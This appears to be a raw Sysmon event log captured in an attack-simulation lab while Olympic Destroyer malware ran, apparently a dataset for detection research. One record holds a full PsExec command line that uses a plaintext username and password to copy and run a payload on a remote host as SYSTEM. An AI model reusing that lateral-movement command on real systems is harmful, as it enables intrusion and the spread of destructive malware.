10341000x8000000000000000292253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.318{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-F805-000000003802}6404C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.298{C8EA50B7-1301-6216-F605-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000292251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:05.283{C8EA50B7-1301-6216-F605-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.283{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.283{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.283{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.283{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.236{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-F705-000000003802}6276C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.236{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-F705-000000003802}6276C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.236{C8EA50B7-1301-6216-F705-000000003802}62766200C:\Windows\system32\conhost.exe{C8EA50B7-1301-6216-F605-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.216{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-F705-000000003802}6276C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.198{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-F705-000000003802}6276C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.120{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.120{C8EA50B7-1300-6216-F305-000000003802}6264C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.120{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1300-6216-F305-000000003802}6264C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.120{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1300-6216-F305-000000003802}6264C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:05.098{C8EA50B7-1300-6216-F305-000000003802}6264C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.083{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-F605-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.067{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-1301-6216-F605-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.077{C8EA50B7-1301-6216-F605-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.067{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-F605-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.067{C8EA50B7-1300-6216-F205-000000003802}6296C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000292231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:05.051{C8EA50B7-1300-6216-F205-000000003802}6296C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.051{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-F505-000000003802}3364C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.051{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-F505-000000003802}3364C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.036{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B57FD0972053513CB532C21BB02584AB,SHA256=F02D056507942B58704B59F48F31413D462BDD5A4E68C677EC3EF2C9DC4E6CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.036{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.036{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.036{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.036{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.036{C8EA50B7-1301-6216-F505-000000003802}3364996C:\Windows\system32\conhost.exe{C8EA50B7-1300-6216-F305-000000003802}6264C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.020{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-F505-000000003802}3364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.015{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1300-6216-F405-000000003802}1016C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.014{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1300-6216-F405-000000003802}1016C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.014{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-F505-000000003802}3364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.998{C8EA50B7-1300-6216-F405-000000003802}10162024C:\Windows\system32\conhost.exe{C8EA50B7-1300-6216-F205-000000003802}6296C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 